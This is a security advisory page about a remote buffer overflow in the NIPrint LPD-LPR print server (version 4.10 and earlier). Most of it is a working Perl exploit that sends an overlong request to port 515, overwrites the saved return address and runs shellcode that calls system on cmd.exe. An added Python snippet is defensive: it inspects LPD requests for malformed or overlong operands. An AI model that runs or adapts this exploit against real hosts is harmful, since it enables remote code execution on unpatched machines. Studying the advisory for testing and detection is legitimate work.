NIPrint LPD-LPR Print Server (Exploit)

Summary

As we reported in our previous article NIPrint LPD-LPR Print Server (Long Request), a vulnerability in NIPrint allows remote attackers to overflow an internal buffer; this in turn can be used to overwrite the saved EIP, allowing code execution.

The following exploit code can be used to test your system for the mentioned vulnerability.

Credit:

The information has been provided by SecurITeam Experts.


Details

Vulnerable systems:
 * NIPrint LPD-LPR Print Server version 4.10 and prior

Exploit:
#!/usr/bin/perl
use IO::Socket;

# Shellcode: builds the string "cmd.exe" on the stack and calls MSVCRT.system
$shellcode = join ("",
"\x90", # - NOP
"\xCC", # - INT3
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x8B\xEC", # - MOV EBP, ESP
"\x55", # - PUSH EBP
"\x8B\xEC", # - MOV EBP, ESP
"\x33\xFF", # - XOR EDI, EDI
"\x57", # - PUSH EDI
"\x83\xEC\x04", # - SUB ESP, 4
"\xC6\x45\xF8\x63", # - MOV BYTE PTR SS:[EBP-8],63h
"\xC6\x45\xF9\x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
"\xC6\x45\xFA\x64", # - MOV BYTE PTR SS:[EBP-6],64h
"\xC6\x45\xFB\x2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
"\xC6\x45\xFC\x65", # - MOV BYTE PTR SS:[EBP-4],65h
"\xC6\x45\xFD\x78", # - MOV BYTE PTR SS:[EBP-3],78h
"\xC6\x45\xFE\x65", # - MOV BYTE PTR SS:[EBP-2],65h
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
"\x50", # - PUSH EAX
"\x8D\x45\xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
"\x50", # - PUSH EAX
"\xFF\x55\xF4", # - CALL DWORD PTR SS:[EBP-C]
"\x5F" # - POP EDI
);

# 0x77f950cb is call ESI in Win2k SP4
$eip = "\xcb\x50\xf9\x77";
#$eip = "BBBB";

$buf = "";

$buf .= "\xCC"; # INT 3
$buf .= "\x83\xC4\x04"; # Add ESP+4
$buf .= "\xFF\xE4"; # Jmp ESP
$buf .= "A" x (49-6); # pad up to the saved return address

$buf .= $eip;
$buf .= $shellcode;

unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => "515",
                                 );
unless ($remote) { die "cannot connect to LPD daemon on $host" }

$remote->autoflush(1);

print $remote $buf;

while (<$remote>)
{
 print $_;
}
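As an added defensive example (not part of the SecurITeam advisory or of NIPrint), the following Python checks a raw port 515 request against the RFC 1179 LPD command grammar and flags the traits of the request above: an invalid command byte, no LF terminator, an operand long enough to reach the 49-byte EIP offset, and non-printable bytes. The 64-byte operand cap and the sample requests are assumptions constructed for this example.

```python
# Added example: heuristic inspection of an LPD (TCP/515) request.
# RFC 1179: one command octet (0x01-0x05), operands, then a single LF.
MAX_OPERAND_LEN = 64          # assumption: generous cap, above the 49-byte EIP offset
VALID_COMMANDS = {1, 2, 3, 4, 5}


def inspect_lpd_request(data: bytes) -> dict:
    """Return the parsed command, operand length and a list of findings."""
    if not data:
        return {"command": None, "operand_len": 0,
                "findings": ["empty request"], "suspicious": True}
    findings = []
    cmd = data[0]
    lf = data.find(b"\n")
    # Operand is everything after the command byte up to the first LF.
    operand = data[1:lf] if lf != -1 else data[1:]
    if cmd not in VALID_COMMANDS:
        findings.append(f"invalid command byte 0x{cmd:02x}")
    if lf == -1:
        findings.append("no LF terminator")
    if len(operand) > MAX_OPERAND_LEN:
        findings.append(f"operand {len(operand)} bytes exceeds {MAX_OPERAND_LEN}")
    nonprint = sum(1 for b in operand if b < 0x20 or b > 0x7E)
    if nonprint:
        findings.append(f"{nonprint} non-printable bytes in operand")
    return {"command": cmd, "operand_len": len(operand),
            "findings": findings, "suspicious": bool(findings)}


# Constructed samples (not captured traffic):
BENIGN = b"\x02lp\n"                 # "receive job" for queue "lp"
NO_TERMINATOR = b"\x02lp"            # well-formed but never terminated
# Shaped like the advisory's request: filler past the 49-byte EIP offset
# plus a few control bytes; no real payload.
HOSTILE = b"\x01" + b"A" * 49 + b"\xcc\x90\x90" + b"B" * 30 + b"\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("no_lf", NO_TERMINATOR),
                         ("hostile", HOSTILE)):
        print(name, inspect_lpd_request(sample))
```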

Categories: Exploits